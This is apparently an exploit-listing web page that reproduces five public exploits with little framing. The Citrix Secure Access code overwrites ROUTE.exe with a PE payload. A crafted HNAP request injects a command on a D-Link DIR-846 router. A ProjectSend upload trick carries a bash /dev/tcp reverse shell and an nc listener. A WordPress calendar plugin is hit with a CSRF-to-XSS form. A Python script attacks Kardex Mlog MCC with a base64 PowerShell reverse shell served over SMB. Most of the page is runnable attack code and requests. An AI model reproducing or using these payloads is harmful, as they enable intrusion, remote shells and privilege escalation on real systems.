Latest exploits :: CodePwn

<pre><code>//Discovered by:: TOUHAMI KASBAOUI - VXREMALWARE //Discover date : 25/03/2023 //Reported to Citrix: 25/03/2023 //Tested Version: 22.2.1.103, 23.1.1.11/Last version //Exploit: https://github.com/sqrtZeroKnowledge/Citrix_Secure_Access_LPE_0DAY #define UNICODE #define _UNICODE #include <Windows.h> #include <string> #include <iostream> #include <Windows.h> #include <iostream> using namespace std; enum Result { unknown, serviceManager_AccessDenied, serviceManager_DatabaseDoesNotExist, service_AccessDenied, service_InvalidServiceManagerHandle, service_InvalidServiceName, service_DoesNotExist, service_Exist }; Result ServiceExists(const std::wstring& serviceName) { Result r = unknown; SC_HANDLE manager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_READ); if (manager == NULL) { DWORD lastError = GetLastError(); if (lastError == ERROR_ACCESS_DENIED) return serviceManager_AccessDenied; else if (lastError == ERROR_DATABASE_DOES_NOT_EXIST) return serviceManager_DatabaseDoesNotExist; else return unknown; } SC_HANDLE service = OpenService(manager, serviceName.c_str(), GENERIC_READ); if (service == NULL) { DWORD error = GetLastError(); if (error == ERROR_ACCESS_DENIED) r = service_AccessDenied; else if (error == ERROR_INVALID_HANDLE) r = service_InvalidServiceManagerHandle; else if (error == ERROR_INVALID_NAME) r = service_InvalidServiceName; else if (error == ERROR_SERVICE_DOES_NOT_EXIST) r = service_DoesNotExist; else r = unknown; } else r = service_Exist; if (service != NULL) CloseServiceHandle(service); if (manager != NULL) CloseServiceHandle(manager); return r; } int main() { const uint8_t shellcode[7168] = { 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, }; //You can set array bin of your reverse shell PE file here std::wstring serviceName = L"aoservice"; Result result = ServiceExists(serviceName); if (result == service_Exist) std::wcout << L"The service '" << serviceName << "' exists." << std::endl; else if (result == service_DoesNotExist) std::wcout << L"The service '" << serviceName << "' does not exist." << std::endl; else std::wcout << L"An error has occurred, and it could not be determined whether the service '" << serviceName << "' exists or not." << std::endl; HANDLE fileHandle = CreateFile(L"C:\\Program Files\\Citrix\\Secure Access Client\\ROUTE.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); cerr << "[*] Loading Malicious file into Citric Secure Access Installer \n"; if (fileHandle == INVALID_HANDLE_VALUE) { cerr << "Failed to create shellcode\n"; return 1; } DWORD bytesWritten; if (!WriteFile(fileHandle, shellcode, sizeof(shellcode), &bytesWritten, NULL)) { cerr << "Failed to write to file\n"; CloseHandle(fileHandle); return 1; } CloseHandle(fileHandle); cout << "Shellcode exported to Citrix Secure Access path \n"; return 0; } </code></pre>

<pre><code># Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability # Google Dork: NA # Date: 30/01/2023 # Exploit Author: Françoa Taffarel # Vendor Homepage: https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suportehttps://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip # Software Link: https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip # Version: DIR846enFW100A53DBR-Retail # Tested on: D-LINK DIR-846 # CVE : CVE-2022-46552 D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter. This vulnerability is exploited via a crafted POST request. ### Malicious POST Request ``` POST /HNAP1/ HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings" HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285 Content-Length: 171 Origin: http://192.168.0.1 Connection: close Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775 Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7; PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4 {"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}} ``` ### Response ``` HTTP/1.1 200 OK X-Powered-By: PHP/7.1.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-type: text/html; charset=UTF-8 Connection: close Date: Thu, 01 Dec 2022 11:03:54 GMT Server: lighttpd/1.4.35 Content-Length: 68 {"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}} ``` ### Data from RCE Request ``` GET /HNAP1/rce_confirmed HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV; PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1 Upgrade-Insecure-Requests: 1 ``` ### Response ``` HTTP/1.1 200 OK Content-Type: application/octet-stream Accept-Ranges: bytes Content-Length: 24 Connection: close Date: Thu, 01 Dec 2022 23:24:28 GMT Server: lighttpd/1.4.35 uid=0(root) gid=0(root) ``` </code></pre>

<pre><code>Exploit Title: projectSend r1605 - Remote Code Exectution RCE Application: projectSend Version: r1605 Bugs: rce via file extension manipulation Technology: PHP Vendor URL: https://www.projectsend.org/ Software Link: https://www.projectsend.org/ Date of found: 26-01-2023 Author: Mirabbas Ağalarov Tested on: Linux POC video: https://youtu.be/Ln7KluDfnk4 2. Technical Details & POC ======================================== 1.The attacker first creates a txt file and pastes the following code. Next, the Attacker changes the file extension to jpg. Because the system php,sh,exe etc. It does not allow files. bash -i >& /dev/tcp/192.168.100.18/4444 0>&1 2.Then the attacker starts listening for ip and port nc -lvp 4444 3.and when uploading file it makes http request as below.file name should be like this openme.sh;jpg POST /includes/upload.process.php HTTP/1.1 Host: localhost Content-Length: 525 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-platform: "Linux" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/upload.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59 Connection: close ------WebKitFormBoundary0enbZuQQAtahFVjI Content-Disposition: form-data; name="name" openme.sh;jpg ------WebKitFormBoundary0enbZuQQAtahFVjI Content-Disposition: form-data; name="chunk" 0 ------WebKitFormBoundary0enbZuQQAtahFVjI Content-Disposition: form-data; name="chunks" 1 ------WebKitFormBoundary0enbZuQQAtahFVjI Content-Disposition: form-data; name="file"; filename="blob" Content-Type: application/octet-stream bash -i >& /dev/tcp/192.168.100.18/4444 0>&1 ------WebKitFormBoundary0enbZuQQAtahFVjI-- 4.In the second request, we do this to the filename section at the bottom. openme.sh POST /files-edit.php?ids=34 HTTP/1.1 Host: localhost Content-Length: 1016 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/files-edit.php?ids=34&type=new Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59 Connection: close ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="csrf_token" 66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02 ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][id]" 34 ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][original]" openme.sh;.jpg ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][file]" 1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][name]" openme.sh ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][description]" ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="file[1][expiry_date]" 25-02-2023 ------WebKitFormBoundaryc8btjvyb3An7HcmA Content-Disposition: form-data; name="save" ------WebKitFormBoundaryc8btjvyb3An7HcmA-- And it doesn't matter who downloads your file. if it opens then reverse shell will be triggered and rce private youtube video poc : https://youtu.be/Ln7KluDfnk4 </code></pre>

<pre><code># Exploit Title: Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS) # Date: 2022-05-25 # Exploit Author: Mostafa Farzaneh # WPScan page: https://wpscan.com/vulnerability/95f92062-08ce-478a-a2bc-6d026adf657c # Vendor Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/ # Software Link: https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.4.06.zip # Version: 1.4.06 # Tested on: Linux # CVE : CVE-2022-2846 # Description: The Calendar Event Multi View WordPress plugin before 1.4.07 does not have any authorisation and CSRF checks in place when creating an event, and is also lacking sanitisation as well as escaping in some of the event fields. This could allow unauthenticated attackers to create arbitrary events and put Cross-Site Scripting payloads in it. #POC and exploit code: As an unauthenticated user, to add a malicious event (on October 6th, 2022) to the calendar with ID 1, open the code below <html> <body> <form action=" https://example.com/?cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=0&method=adddetails" method="POST"> <input type="hidden" name="Subject" value='"><script>alert(/XSS/)</script>' /> <input type="hidden" name="colorvalue" value="#f00" /> <input type="hidden" name="rrule" value="" /> <input type="hidden" name="rruleType" value="" /> <input type="hidden" name="stpartdate" value="10/6/2022" /> <input type="hidden" name="stparttime" value="00:00" /> <input type="hidden" name="etpartdate" value="10/6/2022" /> <input type="hidden" name="etparttime" value="00:00" /> <input type="hidden" name="stpartdatelast" value="10/6/2022" /> <input type="hidden" name="etpartdatelast" value="10/6/2022" /> <input type="hidden" name="stparttimelast" value="" /> <input type="hidden" name="etparttimelast" value="" /> <input type="hidden" name="IsAllDayEvent" value="1" /> <input type="hidden" name="Location" value="CSRF" /> <input type="hidden" name="Description" value='left;">CSRF' /> <input type="hidden" name="timezone" value="4.5" /> <input type="submit" value="Submit request" /> </form> </body> </html> The XSS will be triggered when viewing the related event </code></pre>

<pre><code>#!/usr/bin/env python3 # Exploit Title: Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution) # Date: 12/13/2022 # Exploit Author: Patrick Hener # Vendor Homepage: https://www.kardex.com/en/mlog-control-center # Version: 5.7.12+0-a203c2a213-master # Tested on: Windows Server 2016 # CVE : CVE-2023-22855 # Writeup: https://hesec.de/posts/CVE-2023-22855 # # You will need to run a netcat listener beforehand: ncat -lnvp <port> # import requests, argparse, base64, os, threading from impacket import smbserver def probe(target): headers = { "Accept-Encoding": "deflate" } res = requests.get(f"{target}/\\Windows\\win.ini", headers=headers) if "fonts" in res.text: return True else: return False def gen_payload(lhost, lport): rev_shell_blob = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()' rev_shell_blob_b64 = base64.b64encode(rev_shell_blob.encode('UTF-16LE')) payload = f"""<#@ template language="C#" #> <#@ Import Namespace="System" #> <#@ Import Namespace="System.Diagnostics" #> <# var proc1 = new ProcessStartInfo(); string anyCommand; anyCommand = "powershell -e {rev_shell_blob_b64.decode()}"; proc1.UseShellExecute = true; proc1.WorkingDirectory = @"C:\Windows\System32"; proc1.FileName = @"C:\Windows\System32\cmd.exe"; proc1.Verb = "runas"; proc1.Arguments = "/c "+anyCommand; Process.Start(proc1); #>""" return payload def start_smb_server(lhost): server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445) server.addShare("SHARE", os.getcwd(), '') server.setSMB2Support(True) server.setSMBChallenge('') server.start() def trigger_vulnerability(target, lhost): headers = { "Accept-Encoding": "deflate" } requests.get(f"{target}/\\\\{lhost}\\SHARE\\exploit.t4", headers=headers) def main(): # Well, args parser = argparse.ArgumentParser() parser.add_argument('-t', '--target', help='Target host url', required=True) parser.add_argument('-l', '--lhost', help='Attacker listening host', required=True) parser.add_argument('-p', '--lport', help='Attacker listening port', required=True) args = parser.parse_args() # Probe if target is vulnerable print("[*] Probing target") if probe(args.target): print("[+] Target is alive and File Inclusion working") else: print("[-] Target is not alive or File Inclusion not working") exit(-1) # Write payload to file print("[*] Writing 'exploit.t4' payload to be included later on") with open("exploit.t4", 'w') as template: template.write(gen_payload(args.lhost, args.lport)) template.close() # Start smb server in background print("[*] Starting SMB Server in the background") smb_server_thread = threading.Thread(target=start_smb_server, name="SMBServer", args=(args.lhost,)) smb_server_thread.start() # Rev Shell reminder print("[!] At this point you should have spawned a rev shell listener") print(f"[i] 'ncat -lnvp {args.lport}' or 'rlwrap ncat -lnvp {args.lport}'") print("[?] Are you ready to trigger the vuln? Then press enter!") input() # Wait for input then continue # Trigger vulnerability print("[*] Now triggering the vulnerability") trigger_vulnerability(args.target, args.lhost) # Exit print("[+] Enjoy your shell. Bye!") os._exit(1) if __name__ == "__main__": main() </code></pre>